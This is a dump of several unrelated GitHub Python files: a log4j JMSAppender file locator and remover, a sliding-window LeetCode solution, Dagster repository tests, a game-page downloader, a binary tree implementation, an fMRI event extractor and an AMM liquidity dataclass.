\ndef locate(args, remove, guimode):\n    no_more_data = 'No more files found!\\n'\n    err_module = '>>> Error while deleting: module newzipfile not found. No files were modified! <<<\\n'\n    location = os.path.dirname(os.path.abspath(__file__))\n    empty_obj = object()\n    result_list.append('Pattern \\'%s\\' received' % args)\n\n    result = search(args, location)\n    # report the elements from the generator\n    for element in result:\n        result_list.append(element)\n        # option to delete JMSAppender.class from the archive\n        if remove and ziplib_found:\n            with zipfile.ZipFile(element, 'a') as z:\n                z.remove(f\"org/apache/log4j/net/JMSAppender.class\")\n\n    # if the generator is exhausted, report that no further results were found\n    if next(result, empty_obj) == empty_obj:\n        result_list.append(no_more_data)\n    if remove and ziplib_found is False:\n        result_list.append(err_module)\n\n    if guimode:\n        gui_popup_result(result_list)\n    else:\n        for element in result_list:\n            print(element)\n\n\ndef main():\n    # argparser\n    args_dic = argparser()\n    # dispatch on the keys in the dict\n    if args_dic['default'] is not None and args_dic['remove'] is None:  # DEFAULT\n        print_greeting()\n        locate(args_dic['default'], False, False)\n    elif args_dic['default'] is None and args_dic['remove'] is not None:  # REMOVE\n        print_greeting()\n        locate(args_dic['remove'], True, False)\n    elif args_dic['default'] is None and args_dic['remove'] is None:  # NONE\n        text_input, check_del, event = gui_start()\n        if event == 'Submit':\n            locate(text_input, check_del, True)\n\n\nmain()\n","repo_name":"r1ddl3rz/fileLocator","sub_path":"fileLocator.py","file_name":"fileLocator.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9278653293","text":"# ******************* PROBLEM STATEMENT\n#Given a string s and an integer k, return the length of the longest substring of s that contains at most k distinct characters.\n\n\n# ******************* NOTES\n# 1. I assumed that s would only contain alphabetic chars. This assumption turned out to be false\n# 2. Note the while loop that shifts the left pointer until distinct <= k holds again. Having a WHILE loop w/ an invariant helps in this type of problem\n# 3. Note default dict accepts lambda fxn. 
Go over lambda fxn in python\n\n# ******************* SOLUTION\n# Time Complexity: O(2n) -> O(n)\n\nfrom collections import defaultdict\n\nclass Solution:\n @staticmethod\n def lengthOfLongestSubstringKDistinct(s: str, k: int) -> int:\n alpha = defaultdict(lambda: 0)\n left, right, distinct, longest = 0, 0, 0, 0\n\n while right < len(s):\n if alpha[ord(s[right])] == 0:\n distinct += 1\n\n alpha[ord(s[right])] += 1\n\n # cases where left needs to shift\n if distinct > k:\n while distinct > k:\n alpha[ord(s[left])] -= 1\n if alpha[ord(s[left])] == 0:\n distinct -= 1\n left += 1\n\n # otherwise shift right\n longest = max(longest, right - left + 1)\n right += 1\n\n return longest\n# class Solution:\n# @staticmethod\n# def lengthOfLongestSubstringKDistinct(s: str, k: int) -> int:\n# alpha = [0] * 26\n# left, right, distinct, longest = 0, 0, 0, 0\n#\n# while right < len(s):\n# if alpha[ord(s[right]) - ord('a')] == 0:\n# distinct += 1\n#\n# alpha[ord(s[right]) - ord('a')] += 1\n#\n# # cases where left needs to shift\n# if distinct > k:\n# while distinct > k:\n# alpha[ord(s[left]) - ord('a')] -= 1\n# if alpha[ord(s[left]) - ord('a')] == 0:\n# distinct -= 1\n# left += 1\n#\n# # otherwise shift right\n# longest = max(longest, right - left + 1)\n# right += 1\n#\n# return longest\n\nif __name__ == '__main__':\n assert Solution.lengthOfLongestSubstringKDistinct('aa', 1) == 2\n assert Solution.lengthOfLongestSubstringKDistinct('eceba', 2) == 3\n\n\n\n","repo_name":"eee37/technical-problems","sub_path":"LeetCode/Patterns/SlidingWindow/longest_substring_k_distinct.py","file_name":"longest_substring_k_distinct.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9890797717","text":"import dagster._check as check\nimport pytest\nfrom dagster import (\n AssetKey,\n AssetsDefinition,\n AssetSelection,\n DagsterInvalidDefinitionError,\n JobDefinition,\n RepositoryDefinition,\n asset,\n define_asset_job,\n op,\n repository,\n resource,\n with_resources,\n)\nfrom dagster._core.definitions.cacheable_assets import (\n AssetsDefinitionCacheableData,\n CacheableAssetsDefinition,\n)\nfrom dagster._core.definitions.repository_definition import (\n PendingRepositoryDefinition,\n RepositoryLoadData,\n)\n\nfrom .test_repository import define_empty_job, define_simple_job, define_with_resources_job\n\n\ndef define_cacheable_and_uncacheable_assets():\n class MyCacheableAssets(CacheableAssetsDefinition):\n def compute_cacheable_data(self):\n return [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(self.unique_id)},\n )\n ]\n\n def build_definitions(self, data):\n @op(name=self.unique_id)\n def _op(upstream):\n return upstream + 1\n\n return [\n AssetsDefinition.from_op(\n _op,\n keys_by_input_name=cd.keys_by_input_name,\n keys_by_output_name=cd.keys_by_output_name,\n )\n for cd in data\n ]\n\n @asset\n def upstream():\n return 1\n\n @asset\n def downstream(a, b):\n return a + b\n\n return [MyCacheableAssets(\"a\"), MyCacheableAssets(\"b\"), upstream, downstream]\n\n\n@repository\ndef pending_repo():\n return [\n define_empty_job(),\n define_simple_job(),\n *define_with_resources_job(),\n define_cacheable_and_uncacheable_assets(),\n define_asset_job(\n \"all_asset_job\",\n selection=AssetSelection.keys(\n AssetKey(\"a\"), AssetKey(\"b\"), AssetKey(\"upstream\"), AssetKey(\"downstream\")\n ),\n ),\n ]\n\n\ndef test_resolve_empty():\n 
assert isinstance(pending_repo, PendingRepositoryDefinition)\n with pytest.raises(check.CheckError):\n repo = pending_repo.reconstruct_repository_definition(repository_load_data=None)\n repo = pending_repo.compute_repository_definition()\n assert isinstance(repo, RepositoryDefinition)\n assert isinstance(repo.get_job(\"simple_job\"), JobDefinition)\n assert isinstance(repo.get_job(\"all_asset_job\"), JobDefinition)\n\n\ndef test_resolve_missing_key():\n assert isinstance(pending_repo, PendingRepositoryDefinition)\n with pytest.raises(check.CheckError, match=\"No metadata found\"):\n pending_repo.reconstruct_repository_definition(\n repository_load_data=RepositoryLoadData(\n cached_data_by_key={\n \"a\": [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"a\")},\n )\n ]\n }\n )\n )\n\n\ndef test_resolve_wrong_data():\n assert isinstance(pending_repo, PendingRepositoryDefinition)\n with pytest.raises(\n DagsterInvalidDefinitionError,\n match=(\n r\"Input asset .*\\\"b\\\".* is not produced by any of the provided asset ops and is not one\"\n r\" of the provided sources\"\n ),\n ):\n pending_repo.reconstruct_repository_definition(\n repository_load_data=RepositoryLoadData(\n cached_data_by_key={\n \"a\": [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"a\")},\n )\n ],\n \"b\": [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"upstream\": AssetKey(\"upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"BAD_ASSET_KEY\")},\n )\n ],\n }\n )\n )\n\n\ndef define_resource_dependent_cacheable_and_uncacheable_assets():\n class ResourceDependentCacheableAsset(CacheableAssetsDefinition):\n def __init__(self):\n super().__init__(\"res_downstream\")\n\n def compute_cacheable_data(self):\n return [\n AssetsDefinitionCacheableData(\n keys_by_input_name={\"res_upstream\": AssetKey(\"res_upstream\")},\n keys_by_output_name={\"result\": AssetKey(\"res_midstream\")},\n )\n ]\n\n def build_definitions(self, data):\n @op(name=\"res_midstream\", required_resource_keys={\"foo\"})\n def _op(context, res_upstream):\n return res_upstream + context.resources.foo\n\n return [\n AssetsDefinition.from_op(\n _op,\n keys_by_input_name=cd.keys_by_input_name,\n keys_by_output_name=cd.keys_by_output_name,\n )\n for cd in data\n ]\n\n @asset(required_resource_keys={\"foo\"})\n def res_upstream(context):\n return context.resources.foo\n\n @asset(required_resource_keys={\"foo\"})\n def res_downstream(context, res_midstream):\n return res_midstream + context.resources.foo\n\n return [ResourceDependentCacheableAsset(), res_upstream, res_downstream]\n\n\ndef test_resolve_no_resources():\n \"\"\"Test that loading a repo with a resource-dependent cacheable asset fails if the resource is not\n provided.\n \"\"\"\n with pytest.raises(DagsterInvalidDefinitionError):\n try:\n\n @repository\n def resource_dependent_repo_no_resources():\n return [\n define_resource_dependent_cacheable_and_uncacheable_assets(),\n define_asset_job(\n \"all_asset_job\",\n ),\n ]\n\n resource_dependent_repo_no_resources.compute_repository_definition()\n except DagsterInvalidDefinitionError as e:\n # Make sure we get an error for the cacheable asset in particular\n assert \"res_midstream\" in str(e)\n raise e\n\n\ndef test_resolve_with_resources():\n \"\"\"Test that loading a repo with a resource-dependent cacheable asset succeeds if the resource is\n provided.\n 
\"\"\"\n\n @resource\n def foo_resource():\n return 3\n\n @repository\n def resource_dependent_repo_with_resources():\n return [\n with_resources(\n define_resource_dependent_cacheable_and_uncacheable_assets(), {\"foo\": foo_resource}\n ),\n define_asset_job(\n \"all_asset_job\",\n ),\n ]\n\n repo = resource_dependent_repo_with_resources.compute_repository_definition()\n assert isinstance(repo, RepositoryDefinition)\n assert isinstance(repo.get_job(\"all_asset_job\"), JobDefinition)\n\n\ndef test_group_cached_assets():\n \"\"\"Test that with_attributes works properly on cacheable assets.\"\"\"\n\n class MyCacheableAssets(CacheableAssetsDefinition):\n def compute_cacheable_data(self):\n return [\n AssetsDefinitionCacheableData(\n keys_by_input_name={}, keys_by_output_name={\"result\": AssetKey(self.unique_id)}\n )\n ]\n\n def build_definitions(self, data):\n @op(name=self.unique_id)\n def _op():\n return 5\n\n return [\n AssetsDefinition.from_op(\n _op,\n keys_by_input_name=cd.keys_by_input_name,\n keys_by_output_name=cd.keys_by_output_name,\n )\n for cd in data\n ]\n\n my_cacheable_assets_cool = MyCacheableAssets(\"foo\").with_attributes(\n group_names_by_key={AssetKey(\"foo\"): \"my_cool_group\"}\n )\n\n my_lame_group_sel = AssetSelection.groups(\"my_lame_group\")\n assert (\n len(\n my_lame_group_sel.resolve(\n my_cacheable_assets_cool.build_definitions(\n my_cacheable_assets_cool.compute_cacheable_data()\n )\n )\n )\n == 0\n )\n\n my_cool_group_sel = AssetSelection.groups(\"my_cool_group\")\n assert (\n len(\n my_cool_group_sel.resolve(\n my_cacheable_assets_cool.build_definitions(\n my_cacheable_assets_cool.compute_cacheable_data()\n )\n )\n )\n == 1\n )\n\n\ndef test_multiple_wrapped_cached_assets():\n \"\"\"Test that multiple wrappers (with_attributes, with_resources) work properly on cacheable assets.\"\"\"\n\n @resource\n def foo_resource():\n return 3\n\n my_cacheable_assets_with_group_and_asset = [\n x.with_attributes(\n output_asset_key_replacements={\n AssetKey(\"res_downstream\"): AssetKey(\"res_downstream_too\")\n }\n )\n for x in with_resources(\n [\n x.with_attributes(group_names_by_key={AssetKey(\"res_midstream\"): \"my_cool_group\"})\n for x in define_resource_dependent_cacheable_and_uncacheable_assets()\n ],\n {\"foo\": foo_resource},\n )\n ]\n\n @repository\n def resource_dependent_repo_with_resources():\n return [\n my_cacheable_assets_with_group_and_asset,\n define_asset_job(\n \"all_asset_job\",\n ),\n ]\n\n repo = resource_dependent_repo_with_resources.compute_repository_definition()\n assert isinstance(repo, RepositoryDefinition)\n assert isinstance(repo.get_job(\"all_asset_job\"), JobDefinition)\n\n my_cool_group_sel = AssetSelection.groups(\"my_cool_group\")\n assert (\n len(\n my_cool_group_sel.resolve(\n my_cacheable_assets_with_group_and_asset[0].build_definitions(\n my_cacheable_assets_with_group_and_asset[0].compute_cacheable_data()\n )\n + my_cacheable_assets_with_group_and_asset[1:]\n )\n )\n == 1\n )\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/general_tests/test_pending_repository.py","file_name":"test_pending_repository.py","file_ext":"py","file_size_in_byte":10349,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"37041220579","text":"\"\"\"\n[Saint] Petersburg is one of the simplest games that I play regularly on Yucata.de, so we start\nthere. 
We already have code in the `slowgames` repo to rip the per-game webpages, which contain\nhistory in JavaScript\n\nWe need nomenclature to distinguish between a \"game\" (an instance with an ID where I won or lost\nversus one or more specific opponents) and a game in the sense that Yucata added a new game or\nsomething is my favorite game, etc.\n\"\"\"\nimport os\nimport re\n\nimport requests\n\nclass GameDownloader(object):\n    _downloads_games_root = os.path.join('..', 'downloads', 'games') \n    \n    def __init__(self, game_type='Petersburg'):\n        self._game_type = game_type\n\n    def save_all_games(self):\n        \"\"\"For the game type in question, save the HTML from all game instances to the standard location.\n        \n        There are multiple strategies we could use:\n        1. Try all game numbers and see what game they resolve to. The lowest ID where \n        this works is something between 6_250_000 and 6_500_000\n        2. Walk down the list of top players on a page like https://www.yucata.de/en/Ranking/Game/Petersburg . \n        I have tried this, but these dynamic pages generally don't work well with my way of making requests.\n        It's worth trying.\n        \n        Maybe more?\n        \"\"\"\n        \n        # Can we get the list of top players to work?\n        url = f\"https://www.yucata.de/en/Ranking/Game/{self._game_type}\"\n        response = requests.get(url)\n        print(response.text)\n        with open('temp_response.html', 'w') as thefile:\n            thefile.write(response.text)\n        \n    def _html_for_id(self, game_id):\n        url = f\"https://yucata.de/en/Game/{self._game_type}/{game_id}\"\n        response = requests.get(url)\n        return response.text\n    \n    def _request_top_players_anonymously(self):\n        \"\"\"Adapted from legacy repo in site_yucata/classify_games.py . However, \n        this can only get the top 10 for each game and hence may not be that valuable.\"\"\"\n        url = 'https://yucata.de/de/GameInfo/' + self._game_type\n        try:\n            response = requests.get(url)\n        except TimeoutError as e:\n            raise YucataOSError(wrapped_error=e, game=self._game_type)\n        lines = response.text.split(sep='background-color:white')\n        patt = 'User/([a-zA-Z0-9 ]*)\"'\n        return [re.search(patt, l).group(1) for l in lines if re.search(patt, l)]\n\n    def _attempt_by_brute_force(self):\n        \"\"\"The concept: Just go through each game number in a certain range and report if it's our desired game type.\n        \n        But it doesn't actually work if you're not logged in so never mind.\"\"\"\n        for i in range(12_315_800, 12315900):  # 12315875 is known to be Petersburg\n            url = f\"https://www.yucata.de/de/Game/{self._game_type}/{i}\"\n            print(url)  # response = requests.get(url)\n            # print(f\"{i}: {response.status_code}\")\n            # with open(f\"temp-{i}.html\", 'w') as thefile:\n            #     thefile.write(response.text)\n\n    \n\n    \n    \nif __name__ == \"__main__\":\n    # GameDownloader().save_all_games()\n    # print(GameDownloader()._request_top_players_anonymously())\n    print(GameDownloader()._attempt_by_brute_force())","repo_name":"reed9999/langsam","sub_path":"game_downloader.py","file_name":"game_downloader.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459739211","text":"# BinaryTreeUsingLinkedList\n\nclass Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None \n\nclass Queue:\n    def __init__(self):\n        self.head = None \n        self.tail = None \n\n    def isEmpty(self):\n        return True if not self.head else False \n\n    def create(self, data):\n        if self.head:  # fixed: original tested \"if not self.head\", which wrongly rejected an *empty* queue\n            print (\"The queue is not empty, need to call empty before create\")\n            return \n        node = Node(data)\n        
self.head = node\n self.tail = node \n\n def enqueue(self, data):\n # add at tail, remove at head \n node = Node(data)\n if self.isEmpty():\n self.head = node \n self.tail = node \n\n else:\n self.tail.next = node \n self.tail = node \n\n def dequeue(self):\n if self.isEmpty():\n return \"The queue is empty\"\n nodes = self.head\n if self.head == self.tail:\n self.head = None \n self.tail = None \n else:\n self.head = self.head.next \n return nodes \n\n\n\n# Create\nclass TreeNode:\n def __init__(self, data):\n self.data = data \n self.leftChild = None \n self.rightChild = None \n\n def __str__(self):\n level = 0 \n ret = \" \" * level + str(self.data) + \"\\n\"\n if self.leftChild:\n ret += \" \" * (level + 1) + self.leftChild.__str__()\n else:\n ret += \"\\n\"\n if self.rightChild:\n ret += \" \" * (level + 1) + self.rightChild.__str__()\n else:\n ret += \"\\n\"\n return ret \n\n \ntree = TreeNode(\"Drinks\")\n\nhot = TreeNode(\"Hot\")\ncold = TreeNode(\"Cold\")\n\ntea = TreeNode(\"Tea\")\n\ntree.leftChild = hot\ntree.rightChild = cold\nhot.leftChild = tea \n\n# print(tree)\n\ndef preOrderTraversal(rootNode): # time O(n), space O(n)\n if not rootNode:\n return \n print(rootNode.data)\n preOrderTraversal(rootNode.leftChild) # time O(n/2)\n preOrderTraversal(rootNode.rightChild) # time O(n/2)\n\n\n# preOrderTraversal(tree)\n\ndef inOrderTraversal(rootNode): # time O(n), space(n)\n if not rootNode:\n return \n inOrderTraversal(rootNode.leftChild) # time O(n/2)\n print(rootNode.data)\n inOrderTraversal(rootNode.rightChild) # time O(n/2)\n\n# inOrderTraversal(tree)\n\n\ndef postOrderTraversal(rootNode): # time O(n), space(n)\n if not rootNode:\n return \n postOrderTraversal(rootNode.leftChild) # time O(n/2)\n postOrderTraversal(rootNode.rightChild) # time O(n/2)\n print(rootNode.data)\n\n# postOrderTraversal(tree)\n\n\ndef levelOrderTraversal(rootNode):\n # need a queue\n if not rootNode:\n return \n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n node = q.dequeue()\n node = node.data\n print(node.data)\n if node.leftChild:\n q.enqueue(node.leftChild)\n if node.rightChild:\n q.enqueue(node.rightChild)\n\nlevelOrderTraversal(tree)\n\ndef searchANodeInBinaryTree(rootNode, data) -> bool:\n if not rootNode:\n print(\"The tree is empty\")\n return False \n \n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n node = q.dequeue()\n node = node.data\n if node.data == data:\n return True \n if node.leftChild:\n q.enqueue(node.leftChild)\n if node.rightChild:\n q.enqueue(node.rightChild)\n return False \n\nprint(searchANodeInBinaryTree(tree, \"Tea\"))\n\n\ndef insertNodeBT(rootNode, newNode):\n if not rootNode:\n rootNode = newNode \n else:\n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue()\n treeNode = treeNode.data \n if not treeNode.leftChild:\n treeNode.leftChild = newNode\n break \n q.enqueue(treeNode.leftChild)\n if not treeNode.rightChild:\n treeNode.rightChild = newNode\n break\n q.enqueue(treeNode.rightChild)\n print(\"Insert successfully\")\n\n\ncolar = TreeNode(\"Colar\")\ninsertNodeBT(tree, colar)\nlevelOrderTraversal(tree)\n\ndef getDeepestNode(rootNode):\n if not rootNode:\n return None \n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue()\n treeNode = treeNode.data\n if treeNode.leftChild:\n q.enqueue(treeNode.leftChild)\n if treeNode.rightChild:\n q.enqueue(treeNode.rightChild)\n\n return treeNode \n\n\ndef deleteNodeBT(rootNode, data):\n if not rootNode:\n return \"The tree is empty\"\n \n if not 
rootNode.leftChild and not rootNode.rightChild:\n if rootNode.data == data:\n rootNode = None \n return \"Delete node successfully\"\n else:\n return \"There is no such node in the tree\"\n\n deepestTreeNode = getDeepestNode(rootNode)\n\n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue()\n treeNode = treeNode.data\n\n if treeNode.leftChild and treeNode.leftChild.data == data:\n treeNode.leftChild.data = deepestTreeNode.data \n # deepestTreeNode = None # can't do this way\n deleteDeepestNode(rootNode)\n return \"Delete node successfully\"\n elif treeNode.leftChild:\n q.enqueue(treeNode.leftChild)\n \n if treeNode.rightChild and treeNode.rightChild.data == data:\n treeNode.rightChild.data = deepestTreeNode.data \n # deepestTreeNode = None # can't do this way\n deleteDeepestNode(rootNode)\n return \"Delete node successfully\"\n elif treeNode.rightChild:\n q.enqueue(treeNode.rightChild)\n\n return \"There is no such node in the tree\"\n\n\n\ndef deleteDeepestNode(rootNode): # bugs: how about rootNode itself if the deepest node?\n if not rootNode:\n return \n deepestNode = getDeepestNode(rootNode) # return by ref\n q = Queue()\n q.enqueue(rootNode)\n while not q.isEmpty():\n treeNode = q.dequeue().data \n if treeNode.leftChild is deepestNode:\n treeNode.leftChild = None \n return \n if treeNode.rightChild is deepestNode:\n treeNode.rightChild = None \n return \n \n if treeNode.leftChild:\n q.enqueue(treeNode.leftChild)\n if treeNode.rightChild:\n q.enqueue(treeNode.rightChild)\n\n\ndef deleteBT(rootNode):\n if not rootNode:\n return \"The tree is deleted already\"\n\n rootNode.data = None \n rootNode.leftChild = None \n rootNode.rightChild = None \n return \"The tree is deleted successfully\"\n\n\ntree = TreeNode(\"Drinks\")\nlevelOrderTraversal(tree)\nprint(\"---------------------\")\n# deleteDeepestNode(tree)\nprint(deleteNodeBT(tree, \"Drinks\"))\n\nlevelOrderTraversal(tree)\n# deleteBT(tree)\n# levelOrderTraversal(tree)\n\n\n \n \n\n\n\n\n \n\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"08-Tree/BinaryTreeUsingLinkedList.py","file_name":"BinaryTreeUsingLinkedList.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74095219689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Authors: Daniel van de Velden (d.vandevelden@yahoo.de)\n#\n# License: BSD (3-clause)\n\nimport numpy as np\nimport pandas as pd\nimport os\nimport csv\nimport glob\nimport zipfile\nfrom dv_code.scripts.misc import read_analysis_params \n\ndef extract_events_csv(fname_evt=None, subjID=None, ses=None, params=None):\n\n fdir_evt_src = os.path.dirname(fname_evt)\n fileexts = ['.zip'] # ['.tar.gz', '.bz2', '.zip']\n for ext in fileexts:\n if fname_evt.endswith(ext):\n print ('The file: ', fname_evt, ' has the extension: ', ext)\n \n print(f'# Unpacking: {fname_evt}')\n with zipfile.ZipFile(fname_evt,\"r\") as zip_ref:\n fname_inside_evt = fdir_evt_src + '/' + zip_ref.filelist[0].filename\n zip_ref.extractall(fdir_evt_src)\n print('done...\\n')\n \n tmp_csv = []\n tmp_trash = []\n for jtem in zip_ref.filelist:\n tmp_jtem = fdir_evt_src + '/' + jtem.filename\n if '.csv' in tmp_jtem:\n tmp_csv.append(fdir_evt_src + '/' + jtem.filename)\n else:\n tmp_trash.append(fdir_evt_src + '/' + jtem.filename)\n \n for jtem in tmp_trash:\n os.remove(jtem)\n \n fname_evt_ = tmp_csv[0]\n df = pd.read_csv(fname_evt_)\n \n # extract the relevant input\n 
df_relevant = df[['type','text_welcome.started', 'image_1.started', 'duration_null_event']]\n    \n    N_stims = df_relevant.shape[0]\n    N_runs = round( N_stims / 24 )\n    tsv_header_name = ['onset', 'duration', 'trial_type']\n    \n    fdir_subjBIDS = params.get('fdir_data') + '/' + subjID + '/' + ses + '/func/'\n    \n    for i_run in np.arange(N_runs):\n        \n        dat_w_event_tsv = []\n        fname_w_tsv = fdir_subjBIDS + subjID + '_' + ses + '_run-0' + (str(i_run+1)) + '_bold.tsv'\n        for i_stim in range((i_run) * 24, (i_run + 1) * 24, 1):\n            \n            if i_run == 0:\n                run_offset = df_relevant['text_welcome.started'][i_run * 24]\n            else:\n                run_offset = df_relevant['image_1.started'][i_run * 24] -10\n\n            \n            item_onset = (df_relevant['image_1.started'][i_stim] - run_offset)\n            item_onset_ = str(round(item_onset, 4))\n            item_trial_type = df_relevant['type'][i_stim]\n            dat_w_event_tsv.append([item_onset_, '4', item_trial_type])\n            \n            item_onset_null = str(round(item_onset+4, 4))\n            item_null_dur_ = str( df_relevant['duration_null_event'][i_stim] )\n            dat_w_event_tsv.append([item_onset_null, item_null_dur_, 'null_event'])\n        \n        with open(fname_w_tsv, 'w') as tsvfile:  # open the tsv file for writing\n            tsv_writer = csv.writer(tsvfile, delimiter='\\t')  # csv writer configured for tsv\n            tsv_writer.writerow(tsv_header_name)  # write the header\n            tsv_writer.writerows(dat_w_event_tsv)  # write the rows\n            tsvfile.close()  # redundant inside \"with\", kept from the original\n    \n    \n    fname_w_tsv = fdir_subjBIDS + subjID + '_' + ses + '_run-99_bold.tsv'  # fixed: subjID[1] kept only one character of the subject ID\n    dat_w_event_tsv = []\n    pass_run_time = 0\n    for i_run in np.arange(N_runs):\n        \n        for i_stim in range((i_run) * 24, (i_run + 1) * 24, 1):\n            \n            run_offset = df_relevant['text_welcome.started'][i_run * 24]\n\n            item_onset = (df_relevant['image_1.started'][i_stim] - run_offset + pass_run_time)\n            item_onset_ = str(round(item_onset, 4))\n            item_trial_type = df_relevant['type'][i_stim]\n            dat_w_event_tsv.append([item_onset_, '4', item_trial_type])\n            \n            item_onset_null = str(round(item_onset+4, 4))\n            item_null_dur_ = str( df_relevant['duration_null_event'][i_stim] )\n            dat_w_event_tsv.append([item_onset_null, item_null_dur_, 'null_event'])\n        \n        \n        item_onset_welcome = str((float(item_onset_null) + float(item_null_dur_)))\n        item_welcome_dur_ = str( 10 )\n        dat_w_event_tsv.append([item_onset_welcome, item_welcome_dur_, 'welcome_'])\n        pass_run_time = float(item_onset_welcome) + float(item_welcome_dur_)\n    \n    with open(fname_w_tsv, 'w') as tsvfile:  # open the tsv file for writing\n        tsv_writer = csv.writer(tsvfile, delimiter='\\t')  # csv writer configured for tsv\n        tsv_writer.writerow(tsv_header_name)  # write the header\n        tsv_writer.writerows(dat_w_event_tsv)  # write the rows\n        tsvfile.close()  # redundant inside \"with\", kept from the original\n    \n    return","repo_name":"d-van-de-velden/dv_code","sub_path":"scripts/preprocessing/func_extract_evts.py","file_name":"func_extract_evts.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
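A minimal sketch: the three-column BIDS-style events file the function above writes, reduced to one hypothetical run (onset and duration in seconds; each stimulus followed by a null event; file name and trial types are made up).

import csv

rows = [['0.0000', '4', 'face'], ['4.0000', '2.5', 'null_event']]
with open('sub-01_ses-01_run-01_bold.tsv', 'w', newline='') as tsvfile:
    writer = csv.writer(tsvfile, delimiter='\t')
    writer.writerow(['onset', 'duration', 'trial_type'])
    writer.writerows(rows)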
+{"seq_id":"42156468085","text":"\"\"\"Liquidity data feed manipulation.\n\nFor more information about liquidity in automatic market making pools see :term:`AMM`\nand :term:`XY liquidity model`.\n\"\"\"\n\nimport datetime\nfrom dataclasses import dataclass\nfrom typing import List, Optional, Iterable, Tuple\n\nimport pandas as pd\nimport pyarrow as pa\nfrom dataclasses_json import dataclass_json\nfrom pandas.core.groupby import GroupBy\n\nfrom tradingstrategy.types import UNIXTimestamp, USDollarAmount, BlockNumber, PrimaryKey\nfrom tradingstrategy.utils.groupeduniverse import PairGroupedUniverse\n\n\nclass LiquidityDataUnavailable(Exception):\n    \"\"\"We tried to look up liquidity info for a trading pair, but could not find a sample.\"\"\"\n\n\n@dataclass_json\n@dataclass\nclass XYLiquidity:\n    \"\"\"Data structure that presents liquidity status in bonding curve pool.\n\n    This data structure is for naive x*y=k :term:`AMM` pool.\n    Liquidity is not the part of the normal :term:`technical analysis`,\n    so the dataset server has separate datasets for it.\n\n    Liquidity is expressed as US dollar value of the :term:`quote token` of the pool.\n    For example if the pool is 50 $FOO in reserve0 and 50 $USDC in reserve1, the\n    liquidity of the pool would be expressed as 50 USD.\n\n    Liquidity events, like :term:`candles <candle>`, have open, high, low and close values,\n    depending on which time of the candle they were sampled.\n    \"\"\"\n\n    #: Primary key to identity the trading pair\n    #: Use pair universe to map this to chain id and a smart contract address\n    pair_id: PrimaryKey\n\n    #: Open timestamp for this time bucket.\n    timestamp: UNIXTimestamp\n\n    #: USD exchange rate of the quote token used to\n    #: convert to dollar amounts in this time bucket.\n    #:\n    #: Note that currently any USD stablecoin (USDC, DAI) is\n    #: assumed to be 1:1 and the candle server cannot\n    #: handle exchange rate difference among stablecoins.\n    #:\n    #: The rate is taken at the beginning of the 1 minute time bucket.\n    #: For other time buckets, the exchange rate is the simple average\n    #: for the duration of the bucket.\n    exchange_rate: float\n\n    #: Liquidity absolute values in the pool in different time points.\n    #: Note - for minute candles - if the candle contains only one event (mint, burn, sync)\n    #: the open liquidity value is the value AFTER this event.\n    #: The dataset server does not track the closing value of the previous liquidity event.\n    #: This applies for minute candles only.\n    open: USDollarAmount\n\n    #: Liquidity absolute values in the pool in different time points\n    close: USDollarAmount\n\n    #: Liquidity absolute values in the pool in different time points\n    high: USDollarAmount\n\n    #: Liquidity absolute values in the pool in different time points\n    low: USDollarAmount\n\n    #: Number of liquidity supplied events for pool\n    adds: int\n\n    #: Number of liquidity removed events for the pool\n    removes: int\n\n    #: Number of total events affecting liquidity during the time window.\n    #: This is adds, removes AND swaps AND sync().\n    syncs: int\n\n    #: How much new liquidity was supplied, in the terms of the quote token converted to US dollar\n    add_volume: USDollarAmount\n\n    #: How much liquidity was removed, in the terms of the quote token converted to US dollar\n    remove_volume: USDollarAmount  # fixed: this field was declared as a duplicate add_volume, contradicting the schema below\n\n    #: Blockchain tracking information\n    start_block: BlockNumber\n\n    #: Blockchain tracking information\n    end_block: BlockNumber\n\n    def __repr__(self):\n        human_timestamp = datetime.datetime.utcfromtimestamp(self.timestamp)\n        return f\"@{human_timestamp} O:{self.open} H:{self.high} L:{self.low} C:{self.close} AV:{self.add_volume} RV:{self.remove_volume} A:{self.adds} R:{self.removes} SB:{self.start_block} EB:{self.end_block}\"  # fixed: referenced a nonexistent self.volume\n
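A minimal sketch: the one-sided US-dollar liquidity convention described in the class docstring above, for a naive x*y=k pool; the numbers follow the docstring's 50 $FOO / 50 $USDC example.

reserve_foo = 50.0    # base token reserve (x)
reserve_usdc = 50.0   # quote token reserve (y); the USD stablecoin is assumed 1:1
k = reserve_foo * reserve_usdc      # constant-product invariant x*y=k
liquidity_usd = reserve_usdc * 1.0  # one-sided liquidity: quote reserve times exchange rate
print(k, liquidity_usd)             # 2500.0 50.0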
